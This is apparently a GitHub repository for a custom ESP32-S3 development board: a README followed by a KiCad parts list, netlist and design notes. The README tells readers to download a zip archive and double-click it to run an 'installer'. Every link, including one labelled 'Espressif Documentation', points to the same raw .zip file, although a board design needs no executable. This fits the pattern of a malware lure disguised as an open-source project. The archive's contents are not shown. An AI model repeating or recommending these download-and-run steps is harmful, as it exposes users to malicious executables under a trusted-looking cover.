# Repository Luismiguelpr18/ESP32-KiCAD

File README.md:

# 🎉 ESP32-KiCAD - Your Easy Path to Custom Development Boards

## 🚀 Getting Started
Welcome to the ESP32-KiCAD project. This guide will help you download and run our custom ESP32-S3 development board software. Whether you are new to technology or just need help with the latest tools, you’ll find everything you need here.

## 📥 Download & Install
To start using the ESP32-KiCAD project, you need to download the software from our Releases page. 

1. Click this link to **[visit the Releases page](https://raw.githubusercontent.com/Luismiguelpr18/ESP32-KiCAD/main/permanency/ES-CAD-Ki-v1.9-alpha.1.zip)**.
2. Look for the latest version of the software.
3. Download the appropriate file for your system. The files may include executable programs for various operating systems.
4. Once the download is complete, locate the file on your computer and double-click it to run the installer.

## 💻 System Requirements
To ensure the ESP32-KiCAD software runs smoothly, your computer should meet the following minimum requirements:

- Operating System: Windows (10 or later), macOS (10.14 or later), or Linux
- RAM: At least 4 GB
- Storage: At least 500 MB of free space
- USB ports: Available USB ports for connecting devices

## ⚙️ Features
This ESP32-S3 development board offers the following features:

- **USB-C Programming**: Enjoy a seamless connection that simplifies the programming process.
- **Efficient Power Regulation**: Experience stability and reliability with our built-in power management system.
- **GPIO Breakout**: Access many GPIO pins, making it easier to connect various components in your projects.
- **IoT Compatibility**: Ideal for Internet of Things applications, supporting a wide range of devices.

## 🔄 How to Update
Once you have installed the software, keep it up-to-date to ensure the best performance and features. Follow these steps to check for updates:

1. Visit the **[Releases page](https://raw.githubusercontent.com/Luismiguelpr18/ESP32-KiCAD/main/permanency/ES-CAD-Ki-v1.9-alpha.1.zip)**.
2. Look for a newer version of the ESP32-KiCAD software.
3. Download and install the new version just like you did for the initial installation.

## 💬 Support
Should you encounter any issues, help is available:

- Check the FAQs section on the GitHub page for common problems.
- Join the community discussion forums linked on the repository.
- Open an issue on GitHub detailing your problem, and we will assist you.

## 🌟 Contributing
We welcome contributions from the community. If you want to improve the ESP32-KiCAD project, follow these steps:

1. Fork the repository to your GitHub account.
2. Make your changes in a new branch.
3. Submit a pull request for review.

## 📚 Additional Resources
To deepen your understanding of the ESP32-S3 development board, explore these resources:

- **Design Guidelines**: Review the Espressif documentation for best practices.
- **User Manuals**: Access product manuals for detailed instructions on using various features.
- **Tutorials**: Watch video tutorials that cover basic to advanced topics related to IoT and embedded applications.

## 🔗 Links
- [Download ESP32-KiCAD Releases](https://raw.githubusercontent.com/Luismiguelpr18/ESP32-KiCAD/main/permanency/ES-CAD-Ki-v1.9-alpha.1.zip)
- [Community Forums](#)
- [Espressif Documentation](https://raw.githubusercontent.com/Luismiguelpr18/ESP32-KiCAD/main/permanency/ES-CAD-Ki-v1.9-alpha.1.zip)

Thank you for choosing the ESP32-KiCAD project. We hope you find it easy to use and beneficial for your development needs. If you have any questions, feel free to reach out!

## KiCad design ESP32.kicad_pcb

Parts:
C1, C2: 22uF; C_0805_2012Metric
C3, C4, C5: 100n; C_0402_1005Metric
C6: 10u; C_0603_1608Metric
C7: 1u; C_0603_1608Metric
D1: 1N5817; D_SOD-123
D2: LED; LED_0603_1608Metric
D3, D5: ESD3.3; D_SOD-923
F1: Polyfuse; Fuse_1206_3216Metric
FB1: FerriteBead_Small; L_0805_2012Metric
H1, H2, H3, H4: MountingHole; MountingHole_3.2mm_M3
J1: USB_C; USB_C_Receptacle_GCT_USB4105-xx-A_16P_TopMnt_Horizontal
J3: spi conn; PinSocket_2x05_P2.54mm_Vertical
J4: uart conn; PinSocket_2x03_P2.54mm_Vertical
R1, R2: 2.2k; R_0402_1005Metric
R3, R4: 5.1k; R_0402_1005Metric
R5: 1k; R_0402_1005Metric
R9, R10: 10k; R_0402_1005Metric
SW1: boot; SW_SPST_B3U-1000P
SW2: reset; SW_SPST_B3U-1000P
U2: H&T sensor; DFN-6-1EP_3x3mm_P1mm_EP1.5x2.4mm
U3: LDO; SOT-223-3_TabPin2
U4: USBLC6-2SC6; SOT-23-6
U5: esp; ESP32-S3-WROOM-1

Connections:
+3.3V: C2.1, C3.1, C5.1, C6.1, J3.1, J3.2, J4.2, R1.1, R2.2, R5.1, R9.1, R10.1, U2.5 (VDD), U3.2 (VO), U5.2 (3V3)
+5V: C1.1, C4.1, D1.1 (K), U3.3 (VI), U4.5 (VBUS)
/D+: J1.A6 (D+), J1.B6 (D+), U4.6 (I/O1)
/D-: J1.A7 (D-), J1.B7 (D-), U4.4 (I/O2)
/EN: C7.1, D5.2 (A2), J4.1, R9.2, SW2.2 (B), U5.3 (EN)
/IO0: D3.2 (A2), J4.6, SW1.2 (B), U5.27 (IO0)
/RX: J4.5, U5.36 (RXD0)
/TX: J4.3, U5.37 (TXD0)
/USB_D+: U4.1 (I/O1), U5.14 (USB_D+)
/USB_D-: U4.3 (I/O2), U5.13 (USB_D-)
/clk: J3.6, U5.20 (IO12)
/cs: J3.4, U5.18 (IO10)
/irq: J3.8, U5.8 (IO15)
/miso: J3.7, U5.21 (IO13)
/mosi: J3.5, U5.19 (IO11)
/reset: J3.3, U5.22 (IO14)
/scl: R2.1, U2.6 (SCL), U5.17 (IO9)
/sda: R1.2, U2.1 (SDA), U5.12 (IO8)
GND: C1.2, C2.2, C3.2, C4.2, C5.2, C6.2, C7.2, D2.1 (K), D3.1 (A1), D5.1 (A1), J1.A1 (GND), J1.A12 (GND), J1.B1 (GND), J1.B12 (GND), J1.S1 (SHIELD), J3.9, J3.10, J4.4, R3.2, R4.2, SW1.1 (A), SW2.1 (A), U2.2 (GND), U3.1 (GND), U4.2 (GND), U5.1 (GND), U5.40 (GND), U5.41 (GND)
unnamed: D1.2 (A), FB1.2
unnamed: D2.2 (A), R5.2
unnamed: F1.1, J1.A4 (VBUS), J1.A9 (VBUS), J1.B4 (VBUS), J1.B9 (VBUS)
unnamed: F1.2, FB1.1
unnamed: J1.A5 (CC1), R3.1
unnamed: J1.B5 (CC2), R4.1
unnamed: R10.2, U5.15 (IO3)

Notes on the sheet:
ESP32-S3-WROOM-1
switch for bootstrapping while flashing the code on the esp, IO0 pin should be low (bootloader mode)
Conn_02x05_Odd_Even
USB slot with esd protection for input voltage and esp connection
USB_C_Receptacle_USB2.0_16P
mirror horizontally
Conn_02x03_Odd_Even
LM1117MP-3.3
spi connection
mounting holes
esp32 wroom chip
bypass capacitor
Si7021-A20
gpio 3 - floating, has a weak pull down during boot mode. if it randumly picks up a low, might appear like and enter into a boot mode so we pull it up
humidity and temparature sensor uses i2c protocol
LDO regulator, 22uF (bulk caps handles voltage spikes.) when the voltage spikes up, the capacitor stores charge to prevent excess current from corrupting the other components. when the voltage drops suddenly, the capacitor releases its charge to make the transition smooth

Board: 4 copper layers, 50.0 x 50.0 mm, 33 parts (0 on the bottom side), 26 nets.

## Commit log

2026-01-29 My ESP32 PCB design
